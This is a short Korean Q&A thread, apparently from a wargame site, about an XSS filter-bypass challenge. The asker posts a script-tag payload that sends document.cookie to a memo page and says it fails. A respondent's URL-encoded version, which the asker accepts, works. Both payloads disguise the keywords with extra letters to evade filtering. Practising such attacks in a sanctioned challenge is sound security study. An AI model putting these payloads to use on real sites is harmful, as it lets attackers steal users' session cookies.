완료됨
29 코인 <script src 로 문제를 해결할수 있을까요?(csp bypass 구문 입력)
답변 1 · 추천 0 · 조회 321
XSS Filtering Bypass

제가 생각한건 csp bypass에서 제공된 아래 문구로 기입했으나 실패하여 문의드립니다.
<scronipt src="/vuln?param=locatioonn.href='/memo?memo='%2bdocument.cookie"></scrionpt>

#web
2024.11.21. 21:57
작성자 정보
더 깊이 있는 답변이 필요할 때
드림핵 팀과 멘토에게 직접 문의해 보세요!
Q&A Ticket 시작하기
답변 1
질문자가 채택한 답변입니다. 좋은 지식을 공유해줘서 고마워요!
avatar
Predic
웹해킹 고인물 
<scronipt%20src=%22/vuln?param=locatiooonnn.href=%27/memo?memo=%27%252bdocument.cookie%22%3E</scrionpt>

요렇게 하면 잘 작동하네요

2024.11.22. 11:10